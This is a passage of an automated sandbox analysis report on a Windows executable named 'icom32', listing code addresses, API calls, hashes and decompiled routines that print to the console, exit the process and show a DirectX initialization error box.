        0x0040c3f4
        0x0040c3fa
        0x0040c3fa
        0x0040c45b
        0x0040c45d
        0x0040c45f
        0x0040c45f
        0x0040c471
        0x0040c47d
        0x0040c486
        0x0040c488
        0x0040c488
        0x0040c492
        0x0040c494
        0x0040c4ac
        0x0040c4b2
        0x0040c4b2
        0x0040c4b8
        0x0040c4c7
        0x0040c4ba
        0x0040c4c0
        0x0040c4c0
        0x0040c4cd
        0x0040c4d3
        0x0040c473
        0x0040c47c
        0x0040c47c
        0x0040c471

        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: Info
        • String ID:
        • API String ID: 1807457897-0
        • Opcode ID: ed923042feca6902935afe7c07452c48d24c38187e653d811c9255896a64d3d2
        • Instruction ID: 57fb5caf2fd4da32a6d8e40e97391991b59a5e203b329fb3f2422f8f95230f07
        • Opcode Fuzzy Hash: ed923042feca6902935afe7c07452c48d24c38187e653d811c9255896a64d3d2
        • Instruction Fuzzy Hash: 8921F6B1928200DFEB20A77199D533E3654FB40328F20C77BE452F52E2D67D8846A72E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E00409FB0() {
        				void _v16;
        				long _v20;
        				int _t5;
        				int _t14;
        
        				while(1) {
        					__ecx = __eax;
        					__eax = __eax + 1;
        					if( *__ecx == 0) {
        						break;
        					}
        					__edx = __edx + 1;
        				}
        				__eax =  &_v20;
        				GetStdHandle(0xfffffff4) = WriteFile(__eax, __esi, __edx,  &_v20, 0);
        				 &_v20 =  &_v16;
        				_v16 = 0xa0d;
        				GetStdHandle(0xfffffff4) = WriteFile(__eax,  &_v16, 2,  &_v20, 0);
        				__eax = __edi;
        				_t14 = _t5;
        				E00406EC0();
        				if( *0x410024 == 0) {
        					E00409A30();
        					E00409B40(0);
        					 *0x40f548();
        				} else {
        					if( *0x40f554 != 0) {
        						 *0x40f554();
        					}
        				}
        				 *0x40f510 = 0;
        				ExitProcess(_t14);
        			}







        0x00409fbc
        0x00409fbc
        0x00409fbe
        0x00409fc2
        0x00000000
        0x00000000
        0x00409fc4
        0x00409fc4
        0x00409fc9
        0x00409fd9
        0x00409fe8
        0x00409fef
        0x00409ffd
        0x0040a003
        0x00406f80
        0x00406f82
        0x00406f8e
        0x00406fb7
        0x00406fc3
        0x00406fc8
        0x00406f90
        0x00406f97
        0x00406faf
        0x00406faf
        0x00406f97
        0x00406f9c
        0x00406fa2

        APIs
        • GetStdHandle.KERNEL32(000000F4,?,00000000,00000000,00000000), ref: 00409FD2
        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00409FD9
        • GetStdHandle.KERNEL32(000000F4,?,00000002), ref: 00409FF6
        • WriteFile.KERNEL32(00000000), ref: 00409FFD
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: FileHandleWrite
        • String ID:
        • API String ID: 3320372497-0
        • Opcode ID: 95a351159ba936f58842f551fda7181edbfa1f60826e15287b2950b2e7385fb4
        • Instruction ID: b7d3c4e93a951a471bd7542538c9d89cfedcf3e47952914705911d9f56791a89
        • Opcode Fuzzy Hash: 95a351159ba936f58842f551fda7181edbfa1f60826e15287b2950b2e7385fb4
        • Instruction Fuzzy Hash: 35F05E72514241BFE700DB658D4CF677AACEB8A710F288A38B556DA1E0EA348C05C7A6
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004013B0() {
        
        				return MessageBoxA(0, "A problem occurred creating DirectInput.\nCheck your DirectX version.\nThis demo requires DirectX9.0 or better.", "DirectX Initialization Error", 0x1010);
        			}



        0x004013df

        APIs
        Strings
        • DirectX Initialization Error, xrefs: 004013C3, 004013C8
        • A problem occurred creating DirectInput.Check your DirectX version.This demo requires DirectX9.0 or better., xrefs: 004013C9, 004013CE
        Memory Dump Source
        • Source File: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: Message
        • String ID: A problem occurred creating DirectInput.Check your DirectX version.This demo requires DirectX9.0 or better.$DirectX Initialization Error
        • API String ID: 2030045667-2858858835
        • Opcode ID: c7b1767cf005b00a55e5cc5e99c0d7635ccb520bd2af7105dfca2403ea153c60
        • Instruction ID: f77f38a1219768b23734804a3f9ca5117bcc8bc56e28a70e1f2f7dd5b70a9df1
        • Opcode Fuzzy Hash: c7b1767cf005b00a55e5cc5e99c0d7635ccb520bd2af7105dfca2403ea153c60
        • Instruction Fuzzy Hash: 88D09EA63492043AF130615A6D0AF77B75CC3C2762F10817BBE44A56C5A5A65C1941F9
        Uniqueness

        Uniqueness Score: -1.00%